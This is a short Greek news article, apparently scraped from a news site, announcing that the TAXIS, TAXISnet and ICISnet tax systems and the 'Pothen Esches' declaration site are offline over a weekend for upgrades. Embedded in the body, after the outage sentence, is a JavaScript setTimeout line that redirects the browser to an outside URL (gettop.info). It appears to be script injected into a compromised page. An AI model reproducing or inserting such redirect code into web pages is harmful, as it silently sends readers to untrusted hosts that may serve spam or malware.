Εκτός λειτουργίας το Taxis έως το βράδυ της Κυριακής

0
6
Το σύστημα που υποστηρίζει τη λειτουργεία του συστήματος TAXIS στη Γενική Γραμματεία Πληροφορικών Συστημάτων, Τρίτη 7 Νοεμβρίου 2006. Τη Γ.Γρ.Π.Σ. επισκέφθηκε σήμερα ο ΥφΕΘΟ Αντώνης Μπέζας, όπου παρουσιάστηκε το νέο σύστημα ΤΑΧΙS και ο τρόπος λειτουργείας του.

 

Έως τις οκτώ αύριο το βράδυ δεν θα μπορεί το κοινό να υποβάλλει ηλεκτρονικά Δηλώσεις περιουσιακής κατάστασης στο σύστημα «Πόθεν Έσχες» (www.pothen.gr) λόγω εργασιών αναβάθμισης των ηλεκτρομηχανολογικών υποδομών που πραγματοποιεί η Γενική Γραμματεία Πληροφοριακών Συστημάτων και Διοικητικής Υποστήριξης, επισημαίνεται σε ανακοίνωση του υπουργείου Οικονομικών.

Στην ανακοίνωση αναφέρεται ακόμη ότι δεν λειτουργούν όλα τα Πληροφοριακά Συστήματα του υπουργείου Οικονομικών (TAXISnet, ICISnet ) καθώς και τα Πληροφοριακά Συστήματα άλλων Φορέων (ΙΚΑ, ΟΓΑ, ΕΡΜΗΣ κλπ που συνδέονται μέσω των κωδικών TAXISnet.

Η διακοπή λειτουργίας λόγω των εργασιών υφίσταται από την Παρασκευή στις 20:00. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here